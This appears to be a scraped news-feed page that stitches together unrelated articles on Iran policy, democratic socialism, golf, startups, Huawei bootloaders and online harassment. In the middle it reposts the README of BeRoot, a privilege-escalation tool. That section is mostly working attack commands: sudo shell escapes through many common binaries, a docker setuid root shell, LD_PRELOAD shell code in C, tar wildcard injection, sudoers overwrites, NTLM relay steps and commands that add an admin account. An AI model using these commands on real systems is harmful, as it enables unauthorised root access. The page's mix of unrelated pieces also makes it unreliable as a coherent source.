Monday

Pompeo to Urge Iranians Abroad to 'Support' Anti-Regime Protests


U.S. Secretary of State Mike Pompeo plans on Sunday to urge members of the Iranian diaspora to “support” protesters in Iran, as the Trump administration hints at a desire for regime change in Tehran after turning its back on the Iranian nuclear accord.


President Donald Trump – who has made the Islamic republic a favorite target since his unexpected rapprochement with North Korea – decided on May 8 to restore all the sanctions that had been lifted as part of the multi-nation agreement aimed at preventing Iran from developing nuclear weapons.


Following the U.S. withdrawal that stunned even Washington’s closest European allies, Pompeo on May 21 unveiled a “new strategy” intended to force Iran to yield to a dozen stringent demands or else face the “strongest sanctions in history.”


The next U.S. step is due at 9 p.m. EDT Sunday (0100 UTC Monday) in the Ronald Reagan presidential library in Simi Valley, California, when the secretary of state delivers a speech entitled “Supporting Iranian Voices.”


With the 40th anniversary of the Islamic Revolution of 1979 a year away, Pompeo plans to retrace “40 years of stealing from the Iranian people, the terrorism they have committed around the region, the brutal repression at home” as well as the “religious persecution” there, a senior State Department official told reporters ahead of the speech.


The venue for Pompeo’s address is significant, the official noted: some 250,000 Iranian-Americans live in Southern California.


“He will be exposing some of the corruption” of a “kleptocratic regime,” the diplomat told reporters. “The regime has prioritized its ideological agenda over the welfare of the Iranian people.”


Pompeo launched his campaign against Iran on Twitter last month, saying the government in Tehran and the Revolutionary Guards – the regime’s elite armed corps – had “plundered the country’s wealth” in proxy wars “while Iranian families struggle.”





FILE - Steel workers angered by nonpayment of wages protest outside a government building in Qazvin, Iran, April 25, 2018. (Social media)

FILE – Steel workers angered by nonpayment of wages protest outside a government building in Qazvin, Iran, April 25, 2018. (Social media)

Exploiting growing tensions within


The Trump administration’s strategy appears simple: to exploit the already growing tensions within Iranian society that are being exacerbated by renewed U.S. sanctions that have forced some foreign firms to leave.


There have been a series of anti-government protests in Iran in recent months, prompted by an array of different issues and concerns.


The State Department briefer said Pompeo plans to support “the legitimate demands of the Iranian people, especially their economic demands for a better life.”


But how far will he and the administration go?


“That’s the key question,” Behnam Ben Taleblu of the conservative pressure group Foundation for Defense of Democracies (FDD), told the French news agency AFP. “Pompeo and the administration can do more than just rhetorical support to the Iranian protester.”


Several Iranian dissidents have written to Pompeo to urge him to re-establish punitive measures against the state-owned Islamic Republic of Iran Broadcasting network, which they accuse of abetting human rights violations.


Word of Pompeo’s planned speech has fanned speculation on Washington’s precise intentions.


The State Department insists that the U.S. seeks merely a “change in behavior” by the regime.


But some senior members of the Trump administration – notably national security advisor John Bolton – have made it clear in the past that they would like to see the Tehran regime topple, and Pompeo himself said in May that “the Iranian people get to choose for themselves the kind of leadership they want.”


To Behnam Ben Taleblu, “genuine regime change can only come from inside.”


With an upsurge of “Iranians of all different social classes protesting,” he said, the Trump administration will have to decide whether it wants to “support elements that actually want to change the regime.”


Diplomats and experts in Washington are divided as to whether the protests and social tensions within Iran pose a true threat to the Islamic republic.


Nor is there agreement on what it would actually mean should the Iranian regime fall – but some find that uncertainty deeply worrying.


“The more likely result of regime collapse would be a military coup in the name of restoring order, led by the man Washington’s Iran hawks fear the most: Gen. Qasem Suleimani,” the commander of the Revolutionary Guards, according to Mark Fitzpatrick of the International Institute for Strategic Studies.


“Exerting maximum pressure on Iran could bring about America’s worst nightmare,” he added on Twitter.

Democratic Socialism Rising in the Age of Trump



A week ago, Maine Democrat Zak Ringelstein wasn’t quite ready to consider himself a member of the Democratic Socialists of America, even if he appreciated the organization’s values and endorsement in his bid to become a U.S. senator.


Three days later, he told The Associated Press it was time to join up. He’s now the only major-party Senate candidate in the nation to be a dues-paying democratic socialist.


Ringelstein’s leap is the latest evidence of a nationwide surge in the strength and popularity of an organization that, until recently, operated on the fringes of the liberal movement’s farthest left flank. As Donald Trump’s presidency stretches into its second year, democratic socialism has become a significant force in Democratic politics. Its rise comes as Democrats debate whether moving too far left will turn off voters.


“I stand with the democratic socialists, and I have decided to become a dues-paying member,” Ringelstein told AP. “It’s time to do what’s right, even if it’s not easy.”


There are 42 people running for offices at the federal, state and local levels this year with the formal endorsement of the Democratic Socialists of America, the organization says. They span 20 states, including Florida, Hawaii, Kansas and Michigan.


The most ambitious Democrats in Washington have been reluctant to embrace the label, even as they embrace the policies defining modern-day democratic socialism: Medicare for all, a $15 minimum wage, free college tuition and the abolition of the federal department of Immigration and Customs Enforcement, also known as ICE.


Vermont Sen. Bernie Sanders, Congress’ only self-identified democratic socialist, campaigned Friday with the movement’s newest star, New York City congressional candidate Alexandra Ocasio-Cortez, a 28-year-old former bartender who defeated one of the most powerful House Democrats last month.


Her victory fed a flame that was already beginning to burn brighter. The DSA’s paid membership has hovered around 6,000 in the years before Trump’s election, said Allie Cohn, a member of the group’s national political team.


Last week, its paid membership hit 45,000 nationwide.


There is little distinction made between the terms “democratic socialism” and “socialism” in the group’s literature. While Ringelstein and other DSA-backed candidates promote a “big-tent” philosophy, the group’s constitution describes its members as socialists who “reject an economic order based on private profit” and “share a vision of a humane social order based on popular control of resources and production, economic planning, equitable distribution, feminism, racial equality and non-oppressive relationships.”


Members during public meetings often refer to each other “comrades,” wear clothing featuring socialist symbols like the rose and promote authors such as Karl Marx.


The common association with the failed Soviet Union has made it difficult for sympathetic liberals to explain their connection.


“I don’t like the term socialist, because people do associate that with bad things in history,” said Kansas congressional candidate James Thompson, who is endorsed by the DSA and campaigned alongside Sanders and Ocasio-Cortez, but is not a dues-paying democratic socialist. “There’s definitely a lot of their policies that closely align with mine.”


Thompson, an Army veteran turned civil rights attorney, is running again after narrowly losing a special election last year to fill the seat vacated by Secretary of State Mike Pompeo. Even in deep-red Kansas, he embraces policies like “Medicare for all” and is openly critical of capitalism.


In Hawaii, 29-year-old state Rep. Kaniela Ing isn’t shy about promoting his status as a democratic socialist in his bid for Congress. He said he was encouraged to run for higher office by the same activist who recruited Ocasio-Cortez.


“We figured just lean in hard,” Ing told the AP of the democratic socialist label. He acknowledged some baby boomers may be scared away, but said the policies democratic socialists promote — like free health care and economic equality — aren’t extreme.


Republicans, meanwhile, are encouraged by the rise of democratic socialism — for a far different reason. They have seized on what they view as a leftward lurch by Democrats they predict will alienate voters this fall and in the 2020 presidential race.


The Republican National Committee eagerly notes that Sanders’ plan to provide free government-sponsored health care for all Americans had no co-sponsors in 2013. Today, more than one-third of Senate Democrats and two-thirds of House Democrats have signed onto the proposal, which by one estimate could cost taxpayers as much as $32 trillion.


The co-sponsors include some 2020 presidential prospects, such as Massachusetts Sen. Elizabeth Warren, New Jersey Sen. Cory Booker, New York Sen. Kirsten Gillibrand and California Sen. Kamala Harris.


Those senators aren’t calling themselves democratic socialists but also not disassociating themselves from the movement’s priorities.


Most support the push to abolish ICE, which enforces immigration laws and led the Trump administration’s recent push to separate immigrant families at the U.S.-Mexico border.


Of the group, only Booker hasn’t called for ICE to be abolished, replaced or rebuilt. Yet Booker’s office notes that he’s among the few senators backing a plan to guarantee government-backed jobs to unemployed adults in high-unemployment communities across America.


“Embracing socialist policies like government-run health care, a guaranteed jobs program and open borders will only make Democrats more out of touch,” RNC Chair Ronna Romney McDaniel said.


Despite Ocasio-Cortez’s recent success, most DSA-endorsed candidates have struggled.


Gayle McLaughlin finished eighth in last month’s Democratic primary to become California’s lieutenant governor, earning just 4 percent of the vote. All three endorsed candidates for Maryland’s Montgomery County Council lost last month as well. And Ryan Fenwick was blown out by 58 points in his run to become mayor of Louisville, Kentucky.


Ringelstein, a 32-year-old political neophyte, is expected to struggle in his campaign to unseat Maine Sen. Angus King, an independent who caucuses with Democrats. He is refusing to accept donations from lobbyists or corporate political action committees, which has made fundraising a grind. At the end of June, King’s campaign reported $2.4 million cash on hand while Ringelstein had just $23,000.


He has tapped into the party’s national progressive movement and the southern Maine chapter of the DSA for the kind of grassroots support that fueled Ocasio-Cortez’s victory. As he has done almost every month this year, Ringelstein attended the group’s monthly meeting at Portland’s city hall last Monday.


More than 60 people packed into the room. The group’s chairman, 25-year-old union organizer Meg Reilly, wore a T-shirt featuring three roses.


She cheered the “comrades” softball team’s recent season before moving to an agenda that touched on climate change legislation, a book share program “to further your socialist education,” and an exchange program that lets community members swap favors such as jewelry repair, pet sitting or cooking.


Near the end of the two-hour gathering, Ringelstein thanked the group for “standing shoulder to shoulder with us throughout this entire campaign.”


“We could win a U.S. Senate seat!” he said. “I want to say that over and over. We could win a U.S. Senate seat! So, let’s do this.”

Italy's Molinari Wins Golf's British Open



Professional golfer Francesco Molinari won his first major championship Sunday, defeating an array of the sport’s top stars at the British Open in Carnoustie, Scotland.


The 35-year-old Molinari became the first Italian to capture one of golf’s four major annual titles, shooting a final round 2-under-par 69. He completed a bogey-free round with a 5-foot birdie putt on the 18th hole and then waited to claim the tournament’s Claret Jug trophy as other contenders faltered at the end.


For the tournament, Molinari was 8 under par, two better than a quartet of golfers, Britain’s Justin Rose, Northern Ireland’s Rory McIlroy and two Americans, Xander Schauffele and Kevin Kisner.


The tourney marked the return to prominence for Tiger Woods, the U.S. golfer who has won 14 major championships but none since 2008. With a pair of birdies and eight pars through the first 10 holes Sunday, Woods surged into the lead, but promptly relinquished it with a double bogey on the 11th and a bogey on the 12th.


Woods completed the tourney in sixth place, three shots back of Molinari, his playing partner. It was Woods’ best showing in a major championship since his fourth-place finish at the 2013 Masters in the United States.


BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS












BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS 


A compiled version is available here.


It will be added to the pupy project as a post exploitation module (so it will be executed in memory without touching the disk).


Except one method, this tool is only used to detect and not to exploit. If something is found, templates could be used to exploit it. To use it, just create a test.bat file located next to the service / DLL used. It should execute it once called. Depending on the Redistributable Packages installed on the target host, these binaries may not work.




Check the Following:


  • BeRoot For Windows 

  • BeRoot For Linux



BeRoot For Windows To Check Common Windows Misconfigurations



Run it


|===================================================
|                                                                    |
|                    Windows Privilege Escalation                    |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|===================================================


usage: beRoot.exe [-h] [-l] [-w] [-c CMD]


Windows Privilege Escalation


optional arguments:
  -h, –help         show this help message and exit
  -l, –list         list all softwares installed (not run by default)
  -w, –write        write output
  -c CMD, –cmd CMD  cmd to execute for the webclient check (default: whoami)



All detection methods are described on the following document.



Path containing space without quotes



Consider the following file path:


C:\Program Files\Some Test\binary.exe



If the path contains spaces and no quotes, Windows would try to locate and execute programs in the following order:


  • C:\Program.exe

  • C:\Program Files\Some.exe

  • C:\Program Files\Some Folder\binary.exe

Following this example, if “C:\” folder is writable, it would be possible to create a malicious executable binary called “Program.exe”. If “binary.exe” run with high privilege, it could be a good way to escalate our privilege.


Note: BeRoot realized these checks on every service path, scheduled tasks and startup keys located in HKLM.



How to exploit: 



The vulnerable path runs as:


  • a service: create a malicious service (or compile the service template)

  • a classic executable: Create your own executable.



Writable directory



Consider the following file path:


C:\Program Files\Some Test\binary.exe



If the root directory of “binary.exe” is writable (“C:\Program Files\Some Test”) and run with high privilege, it could be used to elevate our privileges.


Note: BeRoot realized these checks on every service path, scheduled tasks and startup keys located in HKLM.



How to exploit:



  • The service is not running:


Replace the legitimate service by our own, restart it or check how it’s triggered (at reboot, when another process is started, etc.).



  • The service is running and could not be stopped:


Most exploitation will be like that, checks for dll hijacking and try to restart the service using previous technics.



Writable directory on %PATH%



This technic affects the following Windows version:


  • 6.0  => Windows Vista / Windows Server 2008

  • 6.1  => Windows 7 / Windows Server 2008 R2

  • 6.2  => Windows 8 / Windows Server 2012

On a classic Windows installation, when DLLs are loaded by a binary, Windows would try to locate it using these following steps:


– Directory where the binary is located
– C:\Windows\System32
– C:\Windows\System
– C:\Windows\
– Current directory where the binary has been launched
– Directory present in %PATH% environment variable



If a directory on the %PATH% variable is writable, it would be possible to realize DLL hijacking attacks. Then, the goal would be to find a service which loads a DLL not present on each of these path. This is the case of the default “IKEEXT” service which loads the inexistant “wlbsctrl.dll”.



How to exploit: 


Create a malicious DLL called “wlbsctrl.dll” (use the DLL template) and add it to the writable path listed on the %PATH% variable. Start the service “IKEEXT”. To start the IKEEXT service without high privilege, a technic describe on the french magazine MISC 90 explains the following method:



Create a file as following:


C:\Users\bob\Desktop>type test.txt
[IKEEXTPOC]
MEDIA=rastapi
Port=VPN2-0
Device=Wan Miniport (IKEv2)
DEVICE=vpn
PhoneNumber=127.0.0.1



Use the “rasdial” binary to start the “IKEEXT” service. Even if the connection failed, the service should have been started.


C:\Users\bob\Desktop>rasdial IKEEXTPOC test test /PHONEBOOK:test.txt


Or you can try using the Ikeext-Privesc powershell script.



MS16-075


For French user, I recommend the article written on the MISC 90 which explain in details how it works.


This vulnerability has been corrected by Microsoft with MS16-075, however many servers are still vulnerable to this kind of attack. I have been inspired from the C++ POC available here



Here are some explaination (not in details):


  1. Start Webclient service (used to connect to some shares) using some magic tricks (using its UUID)

  2. Start an HTTP server locally

  3. Find a service which will be used to trigger a SYSTEM NTLM hash.

  4. Enable file tracing on this service modifying its registry key to point to our webserver (\\[email protected]\tracing)

  5. Start this service

  6. Our HTTP Server start a negotiation to get the SYSTEM NTLM hash

  7. Use of this hash with SMB to execute our custom payload (SMBrelayx has been modify to realize this action)

  8. Clean everything (stop the service, clean the regritry, etc.).


How to exploit: 


BeRoot realize this exploitation, change the “-c” option to execute custom command on the vulnerable host.


beRoot.exe -c “net user Zapata LaLuchaSigue /add”
beRoot.exe -c “net localgroup Administrators Zapata /add”



AlwaysInstallElevated registry key


AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. To allow it, two registry entries have to be set to 1:


  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated


How to exploit: 


create a malicious msi binary and execute it.



Unattended Install files


This file contains all the configuration settings that were set during the installation process, some of which can include the configuration of local accounts including Administrator accounts. These files are available on these following path:


C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\Sysprep\unattend.xml 
C:\Windows\System32\Sysprep\Panther\unattend.xml




How to exploit: 


Open the unattend.xml file to check if passwords are present on it. Should looks like:


<UserAccounts>
    <LocalAccounts>
        <LocalAccount>
            <Password>
                <Value>RmFrZVBhc3N3MHJk</Value>
                <PlainText>false</PlainText>
            </Password>
            <Description>Local Administrator</Description>
            <DisplayName>Administrator</DisplayName>
            <Group>Administrators</Group>
            <Name>Administrator</Name>
        </LocalAccount>
    </LocalAccounts>
</UserAccounts>




Other possible misconfigurations



Other tests are realized to check if it’s possible to:


  • Modify an existing service

  • Create a new service

  • Modify a startup key (on HKLM)

  • Modify directory where all scheduled tasks are stored: “C:\Windows\system32\Tasks”





BeRoot For Linux




BeRoot is a post exploitation tool to check common misconfigurations on Linux and Mac OS to find a way to escalate our privilege.


To understand privilege escalation on these systems, you should understand at least two main notions: LOLBins (this name has been given for Windows binaries but it should be correct to use it for Linux as well) and Wildcards. 


This Readme explains all technics implemented by BeRoot to better understand how to exploit it.


LOLBins



LOLBins could be used to gain root privilege on a system. These binaries allow a user to execute arbitrary code on the host, so imagine you could have access to one of them with sudo privilege (suid binary or if it’s allowed on the sudoers file), you should be able to execute system command as root.


Here is a list of well-known binaries:


sudo awk ‘BEGIN system(“/bin/sh”)’


  • docker (if you can call docker, no need to run it with sudo)

docker run -v /home/$USER:/h_docs ubuntu bash -c “cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;” && ~/rootshell -p



sudo find . -type d -exec sh -c id \;


  • file viewer



less:!bash


man: !bash or $ sudo man -P whoami man


more: !bash


  • file modifications (cannot be consider as LOLbins but useful for privilege escalation)



cp:sudo cp -f your_file /etc/sudoers


mv:sudo mv -f your_file /etc/sudoers


  • ftp / sftp



export PAGER=./runme.sh


sudo git -p help


sudo mount -o bind /bin/bash /bin/mount


sudo mount


echo “os.execute(‘/bin/sh’)” > /tmp/script.nse


sudo nmap –script=/tmp/script.nse


echo “whoami > /tmp/whoami” > /tmp/tmpfile


sudo rsync  -e ‘sh /tmp/tmpfile’ /dev/null 127.0.0.1:/dev/null 2>/dev/null


cat whoami 


  • scripting languages



lua: os.execute(‘/bin/sh’)


perl: sudo  perl -e ‘exec “/bin/sh”;’


python: sudo  python -c ‘import os;os.system(“/bin/sh”)’


ruby: sudo ruby -e ‘exec “/bin/sh”‘


sudo tar cf archive.tar * –checkpoint=1 –checkpoint-action=exec=sh


text editor


vi: sudo vi -c ‘!sh’ or :!bash or :set shell=/bin/bash:shell or :shell


vim : sudo vim -c ‘!sh’ or :!bash or :set shell=/bin/bash:shell or :shell


echo “whoami > /tmp/whoami” > /tmp/tmpfile


sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root


cat whoami 


  • wget (overwrite system file – need a web server)



sudo wget http://127.0.0.1/sudoers -O /etc/sudoers


echo “/bin/sh” > /tmp/run.sh


sudo zip z.zip * -T -TT /tmp/run.sh


Note: If you have more binary example, do not hesitate to open an issue explaining the technic and I will add it on the list.


Having sudo access on these binaries do not mean you could always manage to execute commands on the system. For example, using the mount binary with a limited user could give you the following well known error, if it’s well configured:


mount: only root can use “–options” option


Wildcards



If you have never heard about Unix wildcards, I suggest you read this very well explained article. Using wildcards could lead into code execution if this one is not well called.


For our example, we want to get a shell (“sh”) using the tar command to execute code on the server. As explained on the LOLBin section, we could get it doing:


tar cf archive.tar * –checkpoint=1 –checkpoint-action=exec=sh


We consider a test file which is used to realize an archive of all files present on the directory.


tar cf archive.tar * 


Here are the steps to exploit this bad configuration:


  • open nano (with no arguments)

  • write something in it



save file using tar arguments as file names:


  • –checkpoint-action=exec=sh

  • –checkpoint=1



Once created, this is what you will find:


-rw-r–r– 1 user user     5 Jan 12 10:34 –checkpoint-action=exec=sh


-rw-r–r– 1 user user     3 Jan 12 10:33 –checkpoint=1


drwxr-xr-x 2 user user  4096 Jan 12 10:34 .


drwxr-xr-x 7 user user  4096 Jan 12 10:29 ..


-rwxr-xr-x 1 user user    22 Jan 12 10:32 test.sh


If this file is executed as root (from cron table, from sudoers, etc.), you should gain root access on the system.


sh-4.3# id


uid=0(root) gid=0(root) groups=0(root)


So depending on which binary and how the wildcard are used, the exploitation can be done or not. So on our example, the exploitation would not work anymore if the file would be like this:


tar cf archive.tar *.txt


Thus, using a tool to detect these misconfigurations is very difficult. A manually analyse should be done to check if it’s a false positive or not.


Sensitive files



Lots of file are run with high permissions on the system (e.g cron files, services, etc.). Here is an example of intersting directories and files:


  • /etc/init.d

  • /etc/cron.d 

  • /etc/cron.daily

  • /etc/cron.hourly

  • /etc/cron.monthly

  • /etc/cron.weekly

  • /etc/sudoers

  • /etc/exports

  • /etc/at.allow

  • /etc/at.deny

  • /etc/crontab

  • /etc/cron.allow

  • /etc/cron.deny

  • /etc/anacrontab

  • /var/spool/cron/crontabs/root



Here are the tests done by BeRoot:



  • checks if you have access with write permission on these files.

  • checks inside the file, to find other paths with write permissions.

  • checks for wildcards (this check could raise false positives, but could also get you useful information). Sometimes, you may need write permissions on a specific folder to create your malicious file (as explained on the wildcard section), this check is not done because it could be done by two many ways on the script and it’s difficult to automate.



Suid binaries



SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it. So if suid file is owned by root, you should execute it using root privilege.


BeRoot prints all suid files because a manually analyse should be done on each binary. However, it realizes some actions:


  • checks if we have write permissions on these binary (why not ? :))

  • checks if a LOLBin is used as suid to be able to execute system commands using it (remember you could have suid LOLBin without beeing able to exectute commands – checks LOLBin section with the false positive example using mount).

To analyse manually, checking for .so files loaded from a writable path should be a great idea (this check has not been implemented on BeRoot):



strace [SUID_PATH] 2>&1 | grep -i -E “open|access|no such file”


NFS Root Squashing



If no_root_squash appears in /etc/exports, privilege escalation may be done. More information can be found here.


Exploitation:



  • mkdir /tmp/nfsdir  # create dir

  • mount -t nfs 192.168.1.10:/shared /tmp/nfsdir # mount directory 

  • cd /tmp/nfsdir

  • cp /bin/bash . # copy wanted shell 

  • chmod +s bash # set suid permission



LD_PRELOAD



If LD_PRELOAD is explicitly defined on sudoers file, it could be used to elevate our privilege. \


For example:



Defaults        env_keep += LD_PRELOAD


Create a share object:


#include <stdio.h>


#include <sys/types.h>


#include <stdlib.h>


void _init() {


unsetenv(“LD_PRELOAD”);


setgid(0);


setuid(0);


system(“/bin/sh”);


Compile it:


gcc -fPIC -shared -o shell.so shell.c -nostartfiles


If you have a binary that you could launch with sudo and NOPASSWD, launch it with LD_PRELOAD pointing to your shared object:


sudo LD_PRELOAD=/tmp/shell.so find


Sudoers file



Most of privilege escalations on Linux servers are done using bad sudo configurations. This configuration can be seen in /etc/sudoers file. 


To better understand the BeRoot workflow, you should have an idea on how a sudoers line is composed.


Basic line pattern:


users  hosts = (run-as) tags: commands


Here is an example using aliases.



User_Alias ADMINS = admin, user, root


Cmnd_Alias ADMIN_CMDS = /sbin/service, /usr/sbin/iptables, python /tmp/file.py


ADMINS ALL = (ALL) NOPASSWD: ADMIN_CMDS


So users “admin”, “user” and “root” could execute “service”, “iptables” and “file.py” without password needed (thanks to NOPASSWD):


admin,user,root ALL = (ALL) NOPASSWD: /sbin/service, /usr/sbin/iptables, python /tmp/file.py


So BeRoot will analyse all rules:


if it affects our user or our user’s group:


  • check if we have write permissions on all possible commands (in our example, it will test “service”, “iptables”, “python” and “/tmp/files.py”)

  • check for LOLBins

  • check for LOLBins + wildcards

  • check if we can impersonate another user (“su” command)

  • check write permissions on sensitive files and suid bin for this user

  • realize again all these checks on the sudoers file using this new user



Download BeRoot


Founders Factory signs Marks & Spencer as exclusive UK retail investor

The model of building vertical market-specific accelerators is now well known, but in the UK, Founders Factory, which has emerged from Lastminute founder Brent Hoberman’s stable of projects, is poised to take it to another level.

Today it launches Founders Factory Retail, a joint venture with UK retail giant Marks & Spencer’s, focused on investing and growing start-ups. M&S will become Founders Factory’s exclusive UK & European partner, and invest in a number of start-ups, sourced through Founders Factory’s network, which will expose the retail business to new “technologies, business models and entrepreneurial thinking”.

M&S famously admitted it had a ‘burning platform’ recently, so it’s to be hoped this startup DNA will re-energise the company. M&S will become the majority shareholder within the JV.

Steve Rowe, Chief Executive said: “Partnering with Founders Factory as their exclusive retail partner gives M&S access to a global network of start-ups and entrepreneurs which will provide disruptive thinking and questioning to the way we work at a time of critical transformation within the business. Founders Factory have a great track record in creating successful businesses and by investing in new innovative technologies and products we hope to change the way we work and operate.”

Brent Hoberman, Co-Founder and Executive Chairman, Founders Factory: “We are excited to partner with M&S as our exclusive retail investor in the UK and combine the company’s scale and experience to support early-stage founders. After over 60 investments in the last two years we have seen the huge potential of combining startup innovation with corporate scale and expertise, and so we are excited by this new chapter in a sector that is changing rapidly through technology.”

Started by Brent Hoberman and Henry Lane Fox, Founders Factory has received investment from L’Oreal, easyJet, Guardian Media Group, Aviva, Holtzbrinck, CSC.

The ideas is that as well as accelerating companies it also incubates them, thus creating, from scratch, around 13 new startups every year. It also invests in 35 startups every year, investing cash, six months of support and provides commercial opportunities with their investors. To date, it’s backed and built over 60 companies and is aiming for 220 within five years.

In an interview with TechCrunch Hoberman added: “This deal with M&S is a new model for us. We expect to expand to more sectors in this way. M&S is an iconic British brand so it’s a really good next step for us. We think we’re succeeding because of the sheer nature of the ambition we have for the project. Just funding an accelerator would not be as successful as this combination of best ideas from the cross-fertilization of sectors, big corporate partners and the network of experience we can tap into.”

“This is a bespoke program with a full-time team of 60 operational people to help. It’s a very different model from the likes of Techstars or Startup Bootcamp, for instance. It has full-time employees and multiple corporates. We have seven corporate backers with shared equity, then on top have WPP’s Wunderman agency. I think this is a globally innovative model. We didn’t copy this from the US.”

Today is the last day to request a bootloader unlock code for Huawei/Honor devices


Chinese technology giant Huawei and its sub-brand Honor have been slowly garnering more respect among the Android enthusiast community in the past year. With timely software updates, commitments to supporting custom development, and widespread Project Treble adoption for all devices they have updated to Android Oreo, it’s not hard to see why Huawei and Honor smartphones were starting to become more popular on our forums. Unfortunately, the company had a sudden change of heart. Two months ago, the company announced that they will stop providing bootloader unlock codes. If you want to unlock the bootloader of your Huawei or Honor device, today is the last day to request a code.


While unlocking the bootloader on a Huawei or Honor device isn’t as simple as on Google or OnePlus devices, it’s not a difficult process. On Huawei and Honor devices, you need to acquire a bootloader unlock code if you want to be able to unlock the bootloader. The page to request a code requires you to fill in details about your device and sign in with your Huawei account, but it’s a fairly simple form to fill out. Getting the bootloader unlock code is usually instant, too, unlike Xiaomi devices where you have to wait 360 hours.


Unlocking the bootloader opens up the ability to gain root access with Magisk or SuperSU, install a custom recovery like TWRP to make backups, flash custom ROMs such as LineageOS, Resurrection Remix, or CarbonROM, flash custom kernels, or flash modifications like ARISE and the Xposed Framework. We’ve shown how flashing an AOSP ROM can result in huge performance improvements on budget Honor devices like the Honor 9 Lite without sacrificing camera quality thanks to mods like the Huawei P20 camera port. None of this would be possible without an unlockable bootloader, which is why it’s a huge blow to the community for the unlock codes to no longer be obtainable.


We have reached out to our contacts at Honor and Huawei and have not heard any news that the company will provide bootloader unlock codes in the future. The company’s reason for ending the program is it provides a “better user experience and avoids issues caused by ROM flashing.” We don’t agree with this reason because the company already makes you jump through hoops to unlock the bootloader. Furthermore, it’s entirely opt-in, so users who experience problems have only themselves to blame if something goes wrong. It certainly doesn’t help that Huawei and Honor stopped providing firmware for local upgrades, either, as their eRecovery tool often fails to restore devices when it’s accessed outside of China.


If you would like to unlock the bootloader on your Huawei or Honor device, you need to register for an unlock code immediately. You don’t necessarily have to unlock the bootloader now, but if you don’t get the code now you’ll never have that option in the future. So go grab that code now and save it somewhere in case you decide to make the plunge. If you do decide to unlock the bootloader, be sure to check out the XDA forum for your device to stay up to date on the latest developments.


Request bootloader unlock code on Huawei or Honor devices



Want more posts like this delivered to your inbox? Enter your email to be subscribed to our newsletter.

Sunday

Tall Poppy aims to make online harassment protection an employee benefit

For the nearly 20 percent of Americans who experience severe online harassment, there’s a new company launching in the latest batch of Y Combinator called Tall Poppy that’s giving them the tools to fight back.

Co-founded by Leigh Honeywell and Logan Dean, Tall Poppy grew out of the work that Honeywell, a security specialist, had been doing to hunt down trolls in online communities since at least 2008.

That was the year that Honeywell first went after a particularly noxious specimen who spent his time sending death threats to women in various Linux communities. Honeywell cooperated with law enforcement to try and track down the troll and eventually pushed the commenter into hiding after he was visited by investigators.

That early success led Honeywell to assume a not-so-secret identity as a security expert by day for companies like Microsoft, Salesforce, and Slack, and a defender against online harassment when she wasn’t at work.

“It was an accidental thing that I got into this work,” says Honeywell. “It’s sort of an occupational hazard of being an internet feminist.”

Honeywell started working one-on-one with victims of online harassment that would be referred to her directly.

“As people were coming forward with #metoo… I was working with a number of high profile folks to essentially batten down the hatches,” says Honeywell. “It’s been satisfying work helping people get back a sense of safety when they feel like they have lost it.”

As those referrals began to climb (eventually numbering in the low hundreds of cases), Honeywell began to think about ways to systematize her approach so it could reach the widest number of people possible.

“The reason we’re doing it that way is to help scale up,” says Honeywell. “As with everything in computer security it’s an arms race… As you learn to combat abuse the abusive people adopt technologies and learn new tactics and ways to get around it.”

Primarily, Tall Poppy will provide an educational toolkit to help people lock down their own presence and do incident response properly, says Honeywell. The company will work with customers to gain an understanding of how to protect themselves, but also to be aware of the laws in each state that they can use to protect themselves and punish their attackers.

The scope of the problem

Based on research conducted by the Pew Foundation, there are millions of people in the U.S. alone, who could benefit from the type of service that Tall Poppy aims to provide.

According to a 2017 study, “nearly one-in-five Americans (18%) have been subjected to particularly severe forms of harassment online, such as physical threats, harassment over a sustained period, sexual harassment or stalking.”

The women and minorities that bear the brunt of these assaults (and, let’s be clear, it is primarily women and minorities who bear the brunt of these assaults), face very real consequences from these virtual assaults.

Take the case of the New York principal who lost her job when an ex-boyfriend sent stolen photographs of her to the New York Post and her boss. In a powerful piece for Jezebel she wrote about the consequences of her harassment.

As a result, city investigators escorted me out of my school pending an investigation. The subsequent investigation quickly showed that I was set up by my abuser. Still, Mayor Bill de Blasio’s administration demoted me from principal to teacher, slashed my pay in half, and sent me to a rubber room, the DOE’s notorious reassignment centers where hundreds of unwanted employees languish until they are fired or forgotten.

In 2016, I took a yearlong medical leave from the DOE to treat extreme post-traumatic stress and anxiety. Since the leave was almost entirely unpaid, I took loans against my pension to get by. I ran out of money in early 2017 and reported back to the department, where I was quickly sent to an administrative trial. There the city tried to terminate me. I was charged with eight counts of misconduct despite the conclusion by all parties that my ex-partner uploaded the photos to the computer and that there was no evidence to back up his salacious story. I was accused of bringing “widespread negative publicity, ridicule and notoriety” to the school system, as well as “failing to safeguard a Department of Education computer” from my abusive ex.

Her story isn’t unique. Victims of online harassment regularly face serious consequences from online harassment.

According to a  2013 Science Daily study, cyber stalking victims routinely need to take time off from work, or change or quit their job or school. And the stalking costs the victims $1200 on average to even attempt to address the harassment, the study said.

“It’s this widespread problem and the platforms have in many ways have dropped the ball on this,” Honeywell says.

Tall Poppy’s co-founders

Creating Tall Poppy

As Honeywell heard more and more stories of online intimidation and assault, she started laying the groundwork for the service that would eventually become Tall Poppy. Through a mutual friend she reached out to Dean, a talented coder who had been working at Ticketfly before its Eventbrite acquisition and was looking for a new opportunity.

That was in early 2015. But, afraid that striking out on her own would affect her citizenship status (Honeywell is Canadian), she and Dean waited before making the move to finally start the company.

What ultimately convinced them was the election of Donald Trump.

“After the election I had a heart-to-heart with myself… And I decided that I could move back to Canada, but I wanted to stay and fight,” Honeywell says.

